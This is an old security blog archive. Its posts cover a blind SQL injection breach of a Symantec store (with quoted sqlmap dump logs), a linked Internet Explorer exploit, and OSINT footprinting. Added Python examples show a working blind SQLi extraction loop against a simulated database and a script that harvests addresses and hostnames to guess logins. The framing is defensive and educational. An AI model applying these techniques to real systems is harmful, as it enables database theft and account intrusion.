Friday, December 4, 2009
Monday, November 23, 2009
Symantec Website Compromised via Blind SQLi
On February 9, 2009, a hacker going by the alias Unu compromised a website run and owned by Kaspersky Lab using a SQL injection attack. Unu has now struck again, successfully attacking a website owned by Symantec using a blind SQLi vector. Unu used two commonly known tools to carry out the attack: Pangolin and sqlmap.
Not familiar with these tools? You should be, and you should be actively checking your websites with them to find your weaknesses before the attackers do. I personally stay attuned to the tools and techniques of the underground. Most attackers cannot afford expensive tools like Core Impact or HP WebInspect (unless they are using a pirated copy), so they resort to building tools and scripts that automate tedious yet effective and focused attack techniques. It is important to use the same types of tools that the threat is using, especially if you have no budget or a very limited one. The Kaspersky and Symantec compromises highlight this fact.
"One of the tables is TB_MEMBER, which contains 70,356 rows of member data (for help I called on the sqlmap tool):
[16:27:41] [INFO] fetching number of columns 'M_EMAIL, M_NAME, M_PASS, M_USERID' entries for table 'TB_MEMBER' on database 'symantecstore'
[16:27:41] [INFO] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS VARCHAR(8000)), CHAR(32)) FROM symantecstore..TB_MEMBER
[16:27:41] [INFO] retrieved: 70356
We randomly selected 6 users, numbers 100 to 105, from the table. I was outraged when I saw the result shown by sqlmap. These users' passwords are stored in CLEAR TEXT! (To protect these users' data, we replaced some letters with X's.)"
"And when we put the sqlmap tool to work, it was little surprise to find that this table contains 122,152 serial numbers.
[16:39:22] [INFO] fetching number of columns 'ProductName, ProductNumber, Serial Number' entries for table 'TB_ORDER' on database 'symantecstore'
[16:39:22] [INFO] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS VARCHAR(8000)), CHAR(32)) FROM symantecstore..TB_ORDER
[16:39:22] [INFO] retrieved: 122152"
SQL injection is NOT a new issue, yet I see a significant number of SQLi vectors posted in malicious forums on a daily basis!
I found data on SQL injection in the Open Source Vulnerability Database (OSVDB) going back to 2000. As seen in the graphic above, the threat world began to focus heavily on SQLi vectors in 2005 and has continued to focus on this issue since.
Why are we not getting ahead of this problem? It is time to stop talking about a secure SDLC and start doing it!
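Blind SQLi works because the application leaks one bit per request (row matched or not), and a tool only needs to ask enough yes/no questions to read out any value, which is exactly what the COUNT(*) lines in the sqlmap log above are doing. The script below is an added example, not part of the original post and not Unu's or sqlmap's code. It rebuilds that inference loop against an in-memory SQLite database with a constructed TB_MEMBER table (column names taken from the log, the three rows invented) behind a hypothetical `vulnerable_lookup` endpoint, then shows the same endpoint written with a parameterised query, which is the SDLC fix the post is asking for. The quoted log is against Microsoft SQL Server (ISNULL, STR, db..table), so the T-SQL there is replaced with SQLite equivalents here.

```python
"""Boolean-based blind SQL injection, simulated offline with sqlite3.

Added example, not code from the original post or from sqlmap: the table,
its rows and the two lookup endpoints are constructed for illustration.
"""
import sqlite3

DB = sqlite3.connect(":memory:")
DB.executescript("""
CREATE TABLE TB_MEMBER (M_USERID TEXT, M_NAME TEXT, M_EMAIL TEXT, M_PASS TEXT);
INSERT INTO TB_MEMBER VALUES ('u100', 'Alice', 'alice@example.test', 'Sup3rS3cret');
INSERT INTO TB_MEMBER VALUES ('u101', 'Bob',   'bob@example.test',   'hunter2');
INSERT INTO TB_MEMBER VALUES ('u102', 'Carol', 'carol@example.test', 'letmein!');
""")


def vulnerable_lookup(user_id: str) -> bool:
    """Hypothetical endpoint: the user id is concatenated straight into the SQL.
    The caller only learns whether a row matched, which is all blind SQLi needs."""
    sql = f"SELECT 1 FROM TB_MEMBER WHERE M_USERID = '{user_id}'"
    return DB.execute(sql).fetchone() is not None


def safe_lookup(user_id: str) -> bool:
    """Same endpoint with a bound parameter: input is data, never parsed as SQL."""
    sql = "SELECT 1 FROM TB_MEMBER WHERE M_USERID = ?"
    return DB.execute(sql, (user_id,)).fetchone() is not None


def ask(oracle, condition: str) -> bool:
    """Inject a condition behind a known-good id; a row comes back only if it is true."""
    return oracle(f"u100' AND ({condition}) -- ")


def blind_length(oracle, expr: str, max_len: int = 64) -> int:
    """Find the length of the value an SQL expression evaluates to."""
    for n in range(max_len + 1):
        if ask(oracle, f"length(({expr})) = {n}"):
            return n
    raise RuntimeError("length not found (NULL result or longer than max_len)")


def blind_extract(oracle, expr: str) -> str:
    """Recover the value of an arbitrary SQL expression one character at a time,
    binary-searching the code point (7 questions per ASCII character)."""
    out = ""
    for pos in range(1, blind_length(oracle, expr) + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(oracle, f"unicode(substr(({expr}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def dump_member_count(oracle) -> str:
    """SQLite counterpart of the COUNT(*) query in the sqlmap log."""
    return blind_extract(oracle, "SELECT CAST(COUNT(*) AS TEXT) FROM TB_MEMBER")


def dump_password(oracle, user_id: str) -> str:
    """Read a stored password the same way; only works because it is in clear text."""
    return blind_extract(oracle, f"SELECT M_PASS FROM TB_MEMBER WHERE M_USERID = '{user_id}'")


if __name__ == "__main__":
    print("rows in TB_MEMBER:", dump_member_count(vulnerable_lookup))
    print("u101 password:", dump_password(vulnerable_lookup, "u101"))
    # Against the parameterised endpoint every probe is just a user id that does not exist.
    print("probe via safe_lookup:", ask(safe_lookup, "1=1"))
```

Run it and the vulnerable endpoint gives up the row count and Bob's password in a few dozen requests, while `safe_lookup` answers False to every probe because the whole payload is compared as a literal user id. Binding parameters is the fix; escaping or filtering quotes is not, since the attacker in the log never needed to break out of a string to reach COUNT(*).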
Resources:
Guide to Building Secure Web Applications and Web Services (Development Guide)
Sunday, November 22, 2009
0-Day for Internet Explorer Released

Microsoft IE CSS Parsing writing-mode Style Memory Corruption
Affected Products
Microsoft Internet Explorer 7
Microsoft Internet Explorer 6
Exploit
http://downloads.securityfocus.com/vulnerabilities/exploits/37085.html
Friday, November 20, 2009
Cloud Computing Risk Assessment
ENISA, supported by a group of subject matter experts comprising representatives from industry, academia and governmental organizations, has conducted, in the context of the Emerging and Future Risk Framework project, a risk assessment of the cloud computing business model and its technologies. The result is an in-depth and independent analysis that outlines some of the information security benefits and key security risks of cloud computing. The report also provides a set of practical recommendations.
Tuesday, November 17, 2009
Open Source Intelligence Gathering for Pentesting
Wikipedia defines Open Source Intelligence (OSINT) as "a form of intelligence collection management that involves finding, selecting, and acquiring information from publicly available sources and analyzing it to produce actionable intelligence." A basic form of OSINT was recently used by a group to burglarize celebrities:
"The group, most 18 and 19 years old, used celebrity Web sites, according to investigators, to figure out when their victims — a roster of young Hollywood that also includes Rachel Bilson of “The O.C.,” Ashley Tisdale of “High School Musical” fame and Audrina Patridge of “The Hills”— would be attending premieres and other events and would therefore not be home."
So, what does this have to do with penetration testing? Very rarely do I see a company, or talk to individuals, that use Competitive Intelligence (CI) or OSINT activities in their testing methodology. This type of activity is defined in the OSSTMM and in the Penetration Testing Framework. Do you know what information exists on the Internet about your company (or yourself) that could be used for an attack?
Prior to tools like Maltego, this was a tedious process using separate tools for individual tasks. A comprehensive list of valuable tools is linked in the Penetration Testing Framework under the "Network Footprinting" section. Download them, use them, and think about how the data they collect could be used to attack you. I bet you will find something that surprises you!
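To make "think about how the data could be used" concrete, here is an added example (not from the original post and not from Maltego or any tool in the Penetration Testing Framework) of the harvesting step those tools automate: pull e-mail addresses and hostnames out of public pages, infer the company's mailbox naming convention from the personal addresses, and predict the address of an employee who has never been seen online. The three "pages", the domain, the people and the hosts are all constructed, so the script runs with no network access.

```python
"""Offline OSINT harvest: addresses and hostnames from page text, then the
naming convention an attacker would use to guess logins.

Added example; the company, domain, people and hosts below are invented.
"""
import re
from collections import Counter

DOMAIN = "example-corp.test"

# Constructed stand-ins for fetched pages: a press page, a speaker bio, a list archive.
PAGES = [
    "Media contact: jane.doe@example-corp.test. Careers: jobs@example-corp.test",
    "John Smith <john.smith@example-corp.test>, platform team. Slides on cdn.example-corp.test; "
    "staff log in at vpn.example-corp.test",
    "Re: [dev] outage, posted by Ana Perez (ana.perez@example-corp.test), see git.example-corp.test",
]

ROLE_ACCOUNTS = {"jobs", "press", "info", "security", "abuse", "postmaster", "sales"}
EMAIL_RE = re.compile(r"[a-z0-9._%+-]+@" + re.escape(DOMAIN), re.I)
HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+" + re.escape(DOMAIN) + r"\b", re.I)


def harvest(pages):
    """Collect unique addresses and hostnames in the target domain from page text."""
    emails, hosts = set(), set()
    for page in pages:
        emails.update(m.lower() for m in EMAIL_RE.findall(page))
        hosts.update(m.lower() for m in HOST_RE.findall(page))
    return sorted(emails), sorted(hosts)


def infer_convention(emails):
    """Guess the personal-mailbox pattern from observed addresses, ignoring role accounts.
    Only two patterns are distinguished: 'first.last' and 'flast' (initial plus surname)."""
    patterns = Counter()
    for addr in emails:
        local = addr.split("@")[0]
        if local in ROLE_ACCOUNTS:
            continue
        patterns["first.last" if "." in local else "flast"] += 1
    return patterns.most_common(1)[0][0] if patterns else None


def predict_address(first, last, convention):
    """Turn a name from a bio, news story or social profile into a probable address/login."""
    first, last = first.lower(), last.lower()
    if convention == "first.last":
        return f"{first}.{last}@{DOMAIN}"
    if convention == "flast":
        return f"{first[0]}{last}@{DOMAIN}"
    raise ValueError("no convention inferred")


def interesting_hosts(hosts):
    """Flag hostnames whose first label suggests remote access or developer services."""
    markers = ("vpn", "git", "mail", "owa", "remote", "jenkins", "staging")
    return [h for h in hosts if any(h.startswith(m) for m in markers)]


if __name__ == "__main__":
    emails, hosts = harvest(PAGES)
    convention = infer_convention(emails)
    print("addresses:", emails)
    print("convention:", convention, "->", predict_address("Mark", "Lee", convention))
    print("hosts worth a closer look:", interesting_hosts(hosts))
```

The point of the exercise is the last two lines of output: a naming convention plus a list of names from public bios yields a username list, and a `vpn.` host yields the place to try it. That chain exists for almost every organisation, which is why footprinting belongs at the start of a test rather than being skipped.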
Milw0rm Dead?!?
We know for sure that str0ke, the maintainer of the popular exploit database milw0rm, is not dead. But what about the milw0rm database? Based on the milw0rm website, RSS feed, and Twitter, it appears dead. No need to worry: the folks at OffSec announced that they are taking over milw0rm from str0ke, along with David Kennedy and others.
"The Exploit Database is up and running... survived day 1. On a last moment fluke, we registered the domain explo.it, which is now also up and running.
The ultimate archive of exploits and vulnerable software and a great resource for vulnerability researchers and security addicts alike. Our aim is to collect exploits from submittals and various mailing lists and concentrate them in one, easy to navigate database. When possible, we've added the vulnerable software for download. We are still in the process of organizing the database. You can download the relevant exploit by clicking the "D" and, when available, download the vulnerable application using the "A" link.
We've improved the search functions on the site, and imported the "papers" and "shellcode" sections from milw0rm. We've been getting our first submissions and are processing them almost in real time. We've set up an IRC channel on freenode, #exploitdb; you are welcome to join in and provide feedback on the database."
There is an Offensive Security Exploit Database search plugin that can be downloaded at:
Friday, November 13, 2009
114 Perl Tools for Enumeration and Testing
A great post on the PenTestIT blog lists 114 Perl tools that can be used for enumeration and security/penetration testing. These are complementary tools for your security toolkit. You might find that you rely on some of them as your main tool of choice, while others serve as secondary checks.
Need a methodology for security testing? Check out the Open Source Security Testing Methodology Manual (OSSTMM) or the Information Systems Security Assessment Framework (ISSAF).